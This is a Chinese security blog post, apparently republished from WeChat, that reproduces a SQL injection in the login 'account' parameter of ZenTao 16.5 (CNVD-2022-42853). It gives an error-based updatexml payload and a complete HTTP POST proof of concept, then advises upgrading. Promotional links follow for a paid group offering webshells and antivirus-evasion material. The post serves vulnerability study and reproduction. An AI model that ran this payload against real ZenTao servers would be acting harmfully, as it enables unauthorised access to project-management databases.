禅道V16.5SQL注入 (CNVD-2022-42853)
2023-3-15 22:19:12 Author: 渗透安全团队(查看原文) 阅读量:64 收藏

现在只对常读和星标的公众号才展示大图推送,建议大家能把渗透安全团队设为星标”,否则可能就看不到了啦

禅道是一款专业的国产开源研发项目管理软件,集产品管理,项目管理, 质量管理,文档管理,组织管理和事务管理于一体,完整覆盖了研发项目管理的核心流程,管理思想基于国际流行的敏捷项目管理方法-Scrum,在遵循其价值观的基础上,结合国内项目研发的现状,整合了任务管理,需要管理,Bug管理,用例管理等多种功能,覆盖软件从计划到发布的整个生命周期。

禅道V16.5未对输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行。

下载环境:

https://www.zentao.net/dl/zentao/16.5/ZenTaoPMS.16.5.win64.exe

下载后双击运行,进入目录运行srart.exe

接着我们启动禅道,访问禅道。

4.1、手工注入复现一

报错型注入Payload:

admin' and updatexml(1,concat(0x7e,(user),0x7e),1) and '1'='1  

4.2、利用Burp抓包

POC如下:

POST /zentao/user-login.html HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencoded
account=admin%27+and++updatexml%281%2Cconcat%280x1%2Cuser%28%29%29%2C1%29+and+%271%27%3D%271

我们抓取的数据包如下:

我们将红框中的内容替换:

升级为最新版禅道。

(本文只做交流学习,切勿违法犯罪!!!)


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247500792&idx=4&sn=ff449cb7b86a1e2686556787414a897f&chksm=c1763e57f601b7417198a224c27d307b105eab65dabfe36a155ed479bc9af19d0f1b3f23181e#rd
如有侵权请联系:admin#unsafe.sh